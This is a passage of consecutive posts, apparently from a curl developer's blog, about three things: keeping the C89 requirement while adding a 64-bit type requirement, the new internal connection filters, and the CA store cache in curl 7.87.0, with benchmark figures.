The question has also been asked that if we consider bumping the requirement, should we then not bump it to C11 at once instead of staying at C99?

Not now

Ultimately, not a single person has yet been able to clearly articulate what benefits such a C flavor requirement bump would provide for the curl project. We mostly see a risk that we all get caught in rather irrelevant discussions and changes that perhaps will not actually bring the project forward very much. Neither in features nor in quality/security.

I think there are still much better things to do and much more worthwhile efforts to spend our energy on that could actually improve the project and bring it forward.

Like improving the test suite, increasing test coverage, making sure more code is exercised by the fuzzers.

A minor requirement change

We have decided that starting with curl 8, we will require that the compiler supports a 64 bit data type. This is not something that existed in the original C89 version but was introduced in C99. However, there is no longer any modern compiler around that does not support this.

This is a way to allow us to stop caring about those odd platforms and write code and checks for when the large types are not very large. It is hard to verify that code nowadays since virtually nobody actually uses such compilers/systems.

Maybe this is the way we can continue to adapt to and use specific post C89 features going forward. By cherry-picking them one by one and adapting to them slowly over time.

It is not a no to C99 forever

I am sure we will bring up this topic for discussion again in the future. We have not closed the door forever or written anything in stone. We have only decided that for the moment we have not been persuaded to switch. Maybe we will in a future.

Other languages

We do not consider switching or rewriting curl into any other language.

Discussion

See reddit and hacker news.

connection filters in curl

In the curl project, one of the holiest and most sacred rules is:

we do not break the API or ABI

Everything else is a matter of discussion.

More features all the time

We keep adding features and we do improvements at a rather high pace. So much that we actually rarely do a release without introducing something new.

To be able to add features and to keep changing curl and making sure that it keeps up with the world around it and that it provides the features and the abilities that a world of Internet transfers needs, we need to make sure that the internals are written correctly. And by correctly, I mean in a way that allows us to extend and change curl when we want to – that doesn’t break the ABIs nor the tests.

Refactors

curl is old and choices sometimes need to be reconsidered. Over the years we have refactored and changed the curl internals and design quite drastically several times. Thanks to an extensive test suite and a library API that was designed from the start to hide most internal choices, this has been possible to do without being visible to users. The upside has been that the internals have become easier to maintain and to extend with more features.

Refactoring again

This time, we are again on a mission to extend the curl feature set as I blogged about recently, and this time we have Stefan Eissing on board to do it.

So, without changing any API or breaking the ABI and having the large set of test cases remain working in the many CI jobs we have, Stefan introduced a new internal concept for curl: connection filters.

Filters

We call them filters but they could also be seen as layers or maybe even domino pieces. Each filter is a piece of network logic and the idea is that we can chain them together at run-time to create protocol cakes (my word). curl can connect to a HTTP proxy, do TLS and speak HTTP/2 over that. That makes three separate filters put together.

Adding for example TLS to the proxy would just be inserting a filter in the right place in the chain, while using the filter-chain is done the same way no matter the filter chain length and independently of which exact filters it consists of.

The previous logic, before the filters, was a more like a vast number of conditional flag checks done in the right order. This new system reduces the amount of conditional checks and it also moves code for handling the different network filters into more localized and compartmentalized functions.

More protocol combos

In addition to the more localized code for specifics features, this new concept more notably makes it easier to build new protocol layer combinations. Adding support for HTTP/2 to the proxy for example, should now ideally be a matter of adding a filter the right way and the transfer pipeline should otherwise “just work”.

Not everything internally is yet converted to filters even if we have merged the first large pull request. Stefan now works on getting more curl code to use this concept before he can get into the actual protocol changes lined up for him.

Performance

The filters do not impact transfer performance, I/O works the same as before.

Details

If you long for more technical details and explanations about this, maybe to be able to dig into the curl source code yourself, then an excellent starting-point is the document in the curl source made for this purpose CONNECTION-FILTERS.md.

curl’s new CA store cache

When setting up a TLS or QUIC connection, a client like curl needs a CA store in order to verify the certificate(s) the server provides in the TLS handshake.

CA store

A CA store is a fancy name for a number of certificates. Certificates for the Certificate Authorities (CAs) that a TLS client trusts. On the curl website, we offer a PEM version of the CA store that Mozilla maintains, for download. This set currently contains 142 certificates and while the exact amount vary a little over time, it has been more than a hundred for many years. A fair amount. And there is nothing in the pipe that will bring down the number significantly anytime soon, to my knowledge. These 142 certificates make up a file that is exactly 225,403 bytes. 1587 bytes per certificate on average.

Load and parse

When setting up a TLS connection, the 142 certificates need to be loaded from the external file into memory and parsed so that the server’s certificate can be verified. So that curl knows that the server it has connected to is indeed the correct server and not a man in the middle, an impostor.

This procedure is a rather costly one, in terms of CPU cycles needed.

Another cache

A classic approach to avoid heavy work is to cache the results from a previous use to be able to reuse them again. Starting in curl 7.87.0 curl introduces a CA store cache.

Now, curl can keep the loaded and parsed CA store in memory associated with the handle and then subsequent requests can avoid re-loading and re-parsing the CA data when new connections are created – if they use the same CA store of course. The performance gain in doing this shortcut can be enormous. After all, most transfers are done using the same single CA store.

To quote the numbers Michael Drake presented in the pull request for this new feature. He measured number of instructions to load and render a particular web page from BBC with the NetSurf browser (which obviously is using libcurl for its HTTPS transfers). With and without this cache.

CA store cacheTotal instruction fetch cost
None5,168,090,712
Enabled1,020,984,411

I think a reduction to one fifth of the original cost is significant.

Converted into a little graph they compare like this (smaller is better):

But even in simpler applications and curl command lines this caching should have a measurable impact as soon as multiple TLS connections are done using the same handle. An extremely common usage pattern.

Life-time

Keeping the data around after use potentially changes the behavior a little, but the huge performance gain made us decide to still do this by default. We compensate this a little by setting the default life-time to 24 hours, so applications that keep handles alive for a very long time will still get the cache flushed and read from file again every day.

The CA store is typically not updated more frequently than once every few months or weeks.

CURLOPT_CA_CACHE_TIMEOUT

This is a new option for libcurl that allows applications to tweak the life-time and CA cache behavior for when the default as described above is not enough.

Details

This CA cache system is so far only supported when curl is built to use OpenSSL or one of its forks. I hope others will get inspired and bring this support for other TLS backends as well as we go forward.

CA cache support for curl was authored by Michael Drake. Thanks!

curl, open source and networking